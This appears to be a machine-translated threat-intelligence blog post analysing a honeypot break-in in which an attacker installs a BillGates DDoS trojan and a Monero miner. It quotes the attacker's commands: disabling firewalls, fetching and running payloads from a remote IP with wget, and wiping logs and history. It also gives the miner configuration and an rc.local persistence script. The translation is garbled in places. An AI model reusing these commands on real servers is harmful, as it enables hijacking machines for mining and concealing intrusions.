This article is published by the Security Data Brain team.
Security data Brain is based on more than 10 years of accumulation in government, education, finance and other important industries, relying on xuanwu shield, honeypot network, global asset detection and other capabilities and hundreds of domestic and foreign intelligence sources, gathered together to form a professional threat intelligence center for server security. Mainly for the important industry servers in China suffered network attacks, the latest dynamic tracking research, to provide users with high-quality information data.
1 introduction
Since its birth, virtual currency has an ambiguous relationship with the black industry. From the beginning, it acts as a medium for underground transactions to become a wallet for ransomware to evade tracking. Wherever interests go, the black industry must follow.
As the price of virtual currency rises in the market, more and more black miners are turning to mining instead of using it.
Of course, the black production itself does not have the necessary conditions for the production of virtual currency, so they moved the broiler mining mind, although the server quality level is not uniform, but every little makes a mickle, the emergence of the pool is greatly convenient for the black production of the footsteps of mining.
two
Recently, heng Threat intelligence team found traces of black mining in the honeypot system. Black production Dalao, I am a network security, you dig mine dig me here, is not a little floating? To battle?
One day, black production of automatic blasting script laborious hardships, finally succeeded in breaking through the honey pot (program ape brother fishing…) As a rule, Dalao likes to check the configuration and performance of the machine first.
The cat/proc/cpuinfo free - mCopy the codeWith a 24-core, 48-thread CPU and up to 128GB of ram, he’ll be thrilled.
First a set of firewall shutdown, iptabeles and SuSEfirewall all shut down.
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stopCopy the codeNext, go to Wget, download the file and execute it to clear up the history (which unfortunately is clearly recorded by our honeypot).
chattr -i /usr/bin/wget chmod 755 /usr/bin/wget yum install -y wget pkill sysxlv rm -f /etc/sysxlv rm -f /etc/sysxlv.1 Wget chmod 755 - c - P/etc/http://111.73.45.73:9789/sysxlv/etc/sysxlv nohup/etc/sysxlv > / dev/null 2 > &1 & export HISTFILE=/dev/null rm -f /var/log/wtmp history -c exitCopy the codeAs we can guess from the above, there is a previously compiled version of SYSXLV.1, so look for and remove this version before starting.
The file captured in the honeypot and the corresponding hash value
Come, let us walk into the information security, see this black production dalao to do what on earth on the server
Three bearing
Sysxlv looks like an executable, so take a look at the basics
Is indeed an EXECUTABLE elF32 program, it seems that there is no shell, then directly on the disassembly tool IDA Pro.
It looks like the BillGates trojans, who run both Windows and Linux. An attacker can use various attack modes, such as TCP-SYN Flood attack, UDP Flood attack, CC attack, and DNS amplification attack.
Take a brief look at the function and structure of this Trojan.
1. Self-verification and undebugging
First, the Trojan decrypts the configuration information in the rodata segment, obtains the file size, compares it with itself, and checks whether GDB exists in the process to achieve the effect of reverse debugging.
2. CheckGatesType
In this function, the Trojan horse will judge the path, by giving different return values, the Trojan horse will take different startup mode. The following table shows the different conditions for different return values.
3. MainBeikong
The most common installation is mainbeikong, which is the default. This function mainly implements the following functions. first calls daemon() to fork a new process, and the parent calls exit(0) so that the starting process cannot be found through ps-a.
Next, it checks for the existence of previous installers, removes files if they exist, and adds setautostart. starts the MainProcess MainProcess.
4. MainProces
The main process does the following.
The execution is suspended at 0x7d0 (2000ms). Delete the temporary upgrade file, read DNS cache information from /etc/resolv.conf, configuration information from conf.n, and the status of the program being executed from cmd.n.
Initialize the CManager, suspend and wait for the C2 instruction to execute.
The following figure shows the main attack means of the Trojan horse.
5. Decrypt data
From the static analysis, the Trojan did not directly return the address written in the program, but through the program decryption. The following dynamic debugging with EDB tool simple.
A string suspected to be encrypted was found in IDA.
By function name, the breakpoint is located to the starting point of the function.
The program goes to 0x08130830 and inserts the previous string.
After decryption we got the return address.
4 turn
From the above analysis, this is probably a small black product, using the mainstream ddos Trojan horse.
But when we look at the honeypot log, there’s more to it than that.
Put in he finished Trojan run and disconnect three minutes later, black production again through the way of blasting into the system.
/etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop chattr -i /usr/bin/wget chmod 755 / usr/bin/wget yum install wget - y pkill sysxlv rm -f/etc/sysxlv wget - c - P/etc/http://111.73.45.73:9789/sysxlj Wget chmod 755 - c - P/etc/http://111.73.45.73:9789/config.json/etc/sysxlj nohup/etc/sysxlj > / dev/null 2 > &1 & wget - c Chmod 755 - P/etc/http://111.73.45.73:9789/jourxlv/etc/jourxlv nohup/etc/jourxlv > / dev/null 2 > &1 & export HISTFILE=/dev/null rm -f /var/log/wtmp history -c exitCopy the codeHere are the hash values for the files.
Below we through the analysis, to speculate, this black production in our honey pot also want to do what.
Let’s start with config.json
{
"algo": "cryptonight",
"api": {
"port": 0,
"access-token": null,
"worker-id": null,
"ipv6": false,
"restricted": true
},
"av": 0,
"background": false,
"colors": true,
"cpu-affinity": null,
"cpu-priority": null,
"donate-level": 1,
"huge-pages": true,
"hw-aes": null,
"log-file": null,
"max-cpu-usage": 75,
"pools": [
{
"url": "mine.ppxxmr.com:3333",
"user": "471Bu7QT79ufDEqDSoKnV3V3aycs5oohTgW5ZTuamAifPBM4M91my5gX9cpp9jGDgcCAuRTtwVKD6hsDAsY7AU19HWjrsbJ",
"pass": "x",
"rig-id": null,
"nicehash": false,
"keepalive": false,
"variant": 1
}
],
"print-time": 60,
"retries": 5,
"retry-pause": 5,
"safe": false,
"threads": null,
"user-agent": null,
"watch": false
}Copy the codeThis is a Monroe coin mining configuration information.
Ore pool is: mine.ppxxmr.com: 3333
The wallet address: 471 bu7qt79ufdeqdsoknv3v3aycs5oohtgw5ztuamaifpbm4m91my5gx9cpp9jgdgccaurttwvkd6hsdasy7au19hwjrsbj
It’s also clear from our data brain that the pool was communicating with a lot of malicious samples
Look again at the shell script jourxlv.
Sysxlj is mentioned in the comments, which may be related to the author.
#! /bin/bash #Welcome like-minded friends to come to exchange. #We are a group of people who have a dream. # by:sysxlj # 2016-03-10Copy the codeFirst, iptables is disabled, rc.loacl is written to boot, sysxlj and itself are backed up to /usr/bin and changed names.
service iptables stop > /dev/null 2>&1 &
host_dir=`pwd`
if [ "sh $host_dir/jourxlv &" = "$(cat /etc/rc.local | grep $host_dir/jourxlv | grep -v grep)" ]; then
echo ""
else
echo "sh $host_dir/jourxlv &" >> /etc/rc.local
fi
cp sysxlj /usr/bin/aher
cp jourxlv /usr/bin/keudlCopy the codeIf the script and sysxlj process are terminated, copy it back from /usr/bin and run it again.
while [ 1 ]; do
Centos_sshd_killn=$(ps aux | grep "$host_dir/sysxlj" | grep -v grep | wc -l)
if [[ $Centos_sshd_killn -eq 0 ]]; then
if [ ! -f "$host_dir/sysxlj" ]; then
if [ -f "/usr/bin/aher" ]; then
cp /usr/bin/aher $host_dir/sysxlj
chmod 755 ./sysxlj
else
echo "No weeget"
fi
fi
./sysxlj &
elif [[ $Centos_sshd_killn -gt 1 ]]; then
for killed in $(ps aux | grep "$host_dir/sysxlj" | grep -v grep | awk '{print $2}'); do
Centos_sshd_killn=$(($Centos_sshd_killn-1))
if [[ $Centos_sshd_killn -eq 1 ]]; then
continue
else
kill -9 $killed
fi
done
else
echo ""
fiCopy the codeSysxlj is similar to SysXLV, but it is probably not the same program. In addition, we also found the configuration script for mining, so we have reason to assume that, Sysxlj is a program that is supposed to be used for Menlo coin mining, and is configured to consume a significant amount of server CPU (75%).
By searching sysXLJ, we found this message online.
And that’s exactly what we suspected.
5 and
I thought this was some kind of scam, but the real purpose was to use the rest of our servers to mine the Monroe coins.
Here is a summary of the whole process of the attack:
- Use SSH blasting to scan network segments on a large scale and try to obtain server shells
- Disable the iptables and SuSEfirewall firewall on the host
- Use wget to download the ddos Trojan horse from its local server, modify permissions and run it
- Download mining procedures, configuration information, process daemon script, use server resources in the background mining
- Deleting Log Information
Below is information about the IP address of the intrusion.
The IP from Shangrao, Jiangxi, was flagged as a malicious host by our intelligence team and multiple open source intelligence.
Below is information about the hacked files
Defense tips:
- Avoid weak SSH passwords and change them periodically.
- Order threat intelligence, obtain SSH blasting blacklist, one key shielding.
- Back up logs and periodically check whether processes occupy a large number of system resources.